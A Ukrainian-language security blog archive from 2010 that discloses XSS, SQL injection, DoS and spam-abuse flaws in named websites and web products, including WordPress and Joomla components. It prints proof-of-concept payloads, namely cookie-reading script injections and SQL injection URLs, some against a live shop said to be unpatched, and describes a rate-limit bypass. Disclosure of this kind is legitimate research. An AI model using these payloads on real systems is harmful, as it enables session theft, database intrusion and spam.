Архів для категорії 'Уразливості'

XSS уразливості на fileshare.in.ua

15:09 04.12.2010

14.04.2010

У жовтні, 05.10.2009, я знайшов Cross-Site Scripting уразливості (persistent та reflected) на проекті http://fileshare.in.ua (файлообмінник та хостінг файлів). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на fileshare.in.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.12.2010

XSS:

Це persistent XSS. При написанні відповіді на сторінці тікета (http://fileshare.in.ua/mailhistory.aspx?tid=70de0308f9ef11a5) або написанні повідомлення на сторінці http://fileshare.in.ua/mail.aspx, в тікеті спрацьовує XSS код (в полі Сообщение). Атака можлива доки тікет відкритий.

XSS:

Це приклад атаки для Mozilla та Firefox до 3.0. Для інших браузерів використовується відповідний атакуюший код.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:23 03.12.2010

В даній добірці уразливості в веб додатках:

  • Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow (деталі)
  • Easy FTP Server 1.7.0.2 Remote BoF (деталі)
  • Local File Inclusion in CMS Source (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • Backdoor and Vulnerabilities in Xerox WorkCentre Printers Web Interface (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • XSS vulnerability in eazyCMS (деталі)
  • Security Notice for CA eHealth Performance Manager (деталі)
  • XSS vulnerability in eazyCMS (деталі)
  • Apple Airport Wireless Products: Promiscuous FTP PORT Allowed in FTP Proxy Provides Security Bypass (деталі)

Уразливості в Register Plus Redux для WordPress

15:01 02.12.2010

18.09.2010

Сьогодні я знайшов Cross-Site Scripting, Insufficient Anti-automation та Full path disclosure уразливості в плагіні Register Plus Redux для WordPress. Про що найближчим часом повідомлю розробникам.

Register Plus Redux є розгалуженням плагіна Register Plus (нова версія від іншого розробника). І уразливості в них подібні (можуть лише адреси відрізнятися).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

02.12.2010

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
"><script>alert(document.cookie)</script>В полях: First Name, Last Name, Website, AIM, Yahoo IM, Jabber / Google Talk, Password, Confirm Password.
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі).

Full path disclosure:

http://site/wp-content/plugins/register-plus-redux/dash_widget.php

http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php

При POST запиті на сторінці http://site/wp-login.php?action=register.

Уразливі версії плагіна Register Plus Redux 3.6.1 та попередні версії.

Уразливості на www.cynthiasays.com

23:51 01.12.2010

У серпні, 09.08.2010, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://www.cynthiasays.com. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1=http://www.google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі). Є лише обмеження на один запит до одного і того ж домену в одну хвилину, але дане обмеження обходиться з використанням домена з www і без.

XSS:

Добірка уразливостей

15:23 01.12.2010

В даній добірці уразливості в веб додатках:

  • EMC HomeBase Server Arbitrary File Upload Vulnerability (деталі)
  • EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities (деталі)
  • Local File Inclusion in CMS Source (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • Novell NetStorage xsrvd Long Pathname Remote Code Execution Vulnerability (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • XSS vulnerability in eazyCMS (деталі)

Уразливості в плагінах для WordPress №23

23:54 30.11.2010

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах NextGEN Gallery та cforms. Для котрих з’явилися експлоіти. NextGEN Gallery - це плагін для створення галерей зображень, cforms - це плагін для створення контактних форм на сайті.

  • XSS Vulnerability in NextGEN Gallery Wordpress Plugin (деталі)
  • cforms WordPress Plugin Cross Site Scripting Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливість на vch.kiev.ua

17:29 30.11.2010

12.04.2010

У жовтні, 04.10.2009, я знайшов SQL Injection уразливіть на проекті http://vch.kiev.ua (інтернет магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на matrix.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.11.2010

SQL Injection:

http://vch.kiev.ua/goods.php?id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Уразливості в Fabrica Engine

23:59 29.11.2010

В 2008 та 2009 роках я знайшов Cross-Site Scripting, Denial of Service та SQL Injection уразливості в Fabrica Engine. Це комерційний движок для онлайн-магазинів. Дані уразливості я виявив на сайті matrix.ua. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/search/?keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://site/search/?keyword=

SQL Injection:

http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1

Уразливі Fabrica Engine 2.1 та попередні версії.

Добірка уразливостей

16:04 29.11.2010

В даній добірці уразливості в веб додатках:

Уразливості в Joomla

15:21 27.11.2010

16.09.2010

У травні, 15.05.2010, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості в Joomla. Уразливості мають місце в компоненті com_contact, що є стандартним компонентом Joomla. Які я виявив на сайті www.school.gov.ua. Про що найближчим часом повідомлю розробникам.

Про подібні уразливості я писав в статті Розсилка спаму через сайти та створення спам-ботнетів.

Також раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.11.2010

Insufficient Anti-automation:

http://site/contact/

На сторінці контактів немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

http://site/contact/

Опція “E-mail a copy of this message to your own address.” на сторінці контактів дозволяє розсилати спам з сайта на довільні емайли. А з використанням Insufficient Anti-automation уразливості можна автоматизовано розсилати спам з сайта в великих обсягах.

Уразливі всі версії Joomla з даним функціоналом (Joomla! 1.5.22 та попередні версії).

Розробники Joomla відмовилися виправляти дані уразливості в своїй системі.